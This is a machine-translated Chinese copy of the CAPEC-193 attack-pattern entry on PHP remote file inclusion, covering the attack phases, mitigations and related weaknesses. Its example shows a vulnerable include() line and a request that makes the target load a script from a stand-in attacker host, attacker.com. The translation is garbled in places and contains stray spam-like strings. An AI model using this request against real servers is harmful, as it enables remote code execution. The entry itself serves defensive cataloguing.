CAPEC - CAPEC - 193: PHP远程文件包含(版本3.9)


常见的攻击模式枚举和分类社区资源识别和理解的攻击

家>CAPEC列表> capec - 193: PHP远程文件包含(版本3.9)

远程文件包含capec - 193: PHP

攻击模式ID: 193

抽象:详细的

视图定制的信息:

描述

在这个模式中对手能够加载和远程执行任意代码从应用程序可用。这通常是通过一个不安全地配置PHP运行时环境和一个消毒不当“包含”或“需要”,然后用户可以控制指任何web访问的文件。这使得对手劫持目标应用程序并强制执行的指令。

攻击的可能性

高

典型的严重性

高

的关系

此表显示了其他的攻击模式和高水平类别相关的这种攻击模式。这些关系被定义为ChildOf ParentOf,给类似的项目可能存在的洞察力在较高和较低的抽象级别。此外,关系如光束,PeerOf, CanAlsoBe定义显示类似的攻击模式,用户可能想要探索。

自然	类型	ID	的名字
ChildOf	标准的攻击模式-一个标准的级别CAPEC中攻击模式是集中在一个特定的方法或技术用于攻击。它通常被视为一个单一的完全执行攻击。标准的攻击模式是为了提供足够的细节来理解特定的技术,以及它如何试图完成预期的目标。标准水平的攻击模式是一种特定类型的一个更抽象的元级别的攻击模式。	253年	远程代码内容

此表显示了这种攻击模式的观点属于和顶级类别内的这一观点。

视图名称	顶级类别
域的攻击	软件
机制的攻击	注入意想不到的东西

执行流程

探索

问卷调查应用程序:使用浏览器或一个自动化工具,敌人之前所有公共网站的链接。他们发现他们记录所有的链接。

技术
使用搜索工具和记录所有的链接。特别注意任何链接,包括参数的URL。
使用一个代理工具来记录所有的链接访问web应用程序的手册中遍历。特别注意任何链接,包括参数的URL。这种类型的手工遍历经常需要识别形式GET方法而不是POST形式形式。
网站使用浏览器手动探索和分析它是如何构建的。许多浏览器的插件可以促进分析或自动发现的URL。

实验

尝试不同输入参数:可用的远程攻击变体使用PHP脚本,生成一个输出在目标应用程序服务器上执行的唯一标识。可能使用一个自动化工具,敌人变化输入的请求他们调查了。他们发送参数,包括有效载荷的变化包括引用远程PHP脚本。他们记录所有来自服务器的响应,包括执行远程PHP脚本的输出。

技术
用探针的列表字符串注入参数已知的url。PHP的探针字符串变量远程文件包含有效载荷包括对手的引用控制远程PHP脚本。
使用一个代理工具记录结果手工输入远程文件包含探测器的url。

利用

运行任意服务器端代码:对手成功地利用该漏洞,他们可以在应用程序中执行服务器端代码。恶意代码的虚拟目标应用程序访问相同的资源。注意,对手可能包括shell代码在服务器上的脚本并执行命令相同的特权运行PHP运行时。

技术
开发恶意PHP脚本注入通过向量在实验阶段识别和执行的应用程序服务器执行一个自定义的PHP脚本。

先决条件

目标应用服务器必须允许远程文件包含在“需要”,“包括”,等等。PHP指令

敌人必须有能力使HTTP请求到目标web应用程序。

技能要求

(等级:低)

注入恶意代码的网页

(级别:中等)

在应用程序中绕过过滤器

所需资源

没有:不需要专门的资源来执行这种类型的攻击。

后果

这个表指定不同的个体与攻击模式相关的后果。范围确定违反了安全属性,而影响了负面的技术影响,如果敌人成功的攻击。可能提供的信息如何可能的具体结果预计将看到列表中相对于其它后果。例如,可能有高可能性模式将被用来实现一定的影响,但较低的可能性,它将被利用来实现不同的影响。

范围	影响	可能性
完整性	修改数据
保密	读取数据
授权	执行未经授权的命令
问责制身份验证授权不可抵赖性	获得特权
访问控制授权	旁路保护机制

缓解措施

实现:对所有远程执行输入验证内容,包括远程和用户生成内容

实现:只允许已知文件包括(allowlist)

实现:使用间接引用传入URL参数代替文件名

配置:确保远程脚本不能包括在“包括”或“需要”PHP指令

例子,实例

对手控制服务器上的PHP脚本“http://attacker.com/rfi.txt”
. txt扩展给出,这样不会执行脚本attacker.com服务器,它将作为文本下载。目标应用程序是容易PHP远程文件包含如下:包括($ _GET [' filename ']。. txt)
对手创建一个HTTP请求,通过自己的脚本包括:http://example.com/file.php?filename=http: / /attacker.com/rfi的连接”。txt”前缀,PHP运行时下载攻击脚本,脚本执行的内容在同一上下文的其他原始脚本。

相关的弱点

一个相关的弱点将一个弱点与这种攻击模式的关系。各协会意味着必须存在一个弱点,对于一个给定的攻击才能成功。如果多个缺陷相关的攻击模式,那么任何的弱点(但不是全部)可能存在的攻击才能成功。每一个相关的弱点是由CWE标识符。

CWE-ID	疲软的名字
98年	不当控制包括/需要声明在PHP程序的文件名(PHP远程文件包含)
80年	不当中和与脚本相关的所有HTML标记的Web页面(基本XSS)

引用

[REF-59]“WASC威胁分类2.0”。WASC-05——远程文件包含。Web应用程序安全联盟(WASC)。2010年。<http://projects.webappsec.org/Remote-File-Inclusion>。

REF-60肖恩出彩。“血字的研究,利用常见的漏洞在PHP应用程序”。黑帽简报2001年亚洲。<http://securereality.com.au/studyinscarlett/>。

[REF-30]“OWASP前十名2007”。OWASP十大2007 A3 -恶意文件执行。2007。开放的Web应用程序安全项目(OWASP)。<https://www.owasp.org/www-pdf-archive/OWASP_Top_10_2007.pdf>。

[ref - 621]“OWASP漏洞”。PHP文件包含。开放的Web应用程序安全项目(OWASP)。<https://owasp.org/www-community/vulnerabilities/PHP_File_Inclusion>。

内容的历史

提交
提交日期	提交者	组织
2014-06-23 (版本2.6)	CAPEC内容团队	manbetx客户端首页
2014-06-23 (版本2.6)
修改
修改日期	修饰符	组织
2017-08-04 (版本2.11)	CAPEC内容团队	manbetx客户端首页
2017-08-04 (版本2.11)	更新Attack_Phases Attack_Prerequisites,描述总结,Examples-Instances Payload_Activation_Impact Resources_Required
2018-07-31 (版本2.12)	CAPEC内容团队	manbetx客户端首页
2018-07-31 (版本2.12)	更新的引用
2019-04-04 (版本3.1)	CAPEC内容团队	manbetx客户端首页
2019-04-04 (版本3.1)	更新后的后果
2020-07-30 (版本3.3)	CAPEC内容团队	manbetx客户端首页
2020-07-30 (版本3.3)	更新Example_Instances Execution_Flow,移植
2020-12-17 (版本3.4)	CAPEC内容团队	manbetx客户端首页
2020-12-17 (版本3.4)	更新的引用
2021-06-24 (版本3.5)	CAPEC内容团队	manbetx客户端首页
2021-06-24 (版本3.5)	更新Related_Weaknesses
2022-09-29 (版本3.8)	CAPEC内容团队	manbetx客户端首页
2022-09-29 (版本3.8)	更新Example_Instances

更多的信息是可用的,请选择一个不同的过滤器。

页面最后更新或审查:2018年7月31日


	站点地图\|使用条款\|隐私政策\|联系我们\| 使用常见的攻击模式枚举和分类(CAPEC)和相关的引用从这个网站的使用条款。CAPEC赞助的美国国土安全部(DHS)网络和基础设施安全机构(CISA)和管理的国土安全系统工程和发展研究所这是由(HSSEDI)manbetx客户端首页(斜方)。版权©2007 - 2023,斜方公司。manbetx客户端首页CAPEC和CAPEC标志是斜方公司的商标。manbetx客户端首页

常见的攻击模式枚举和分类

远程文件包含capec - 193: PHP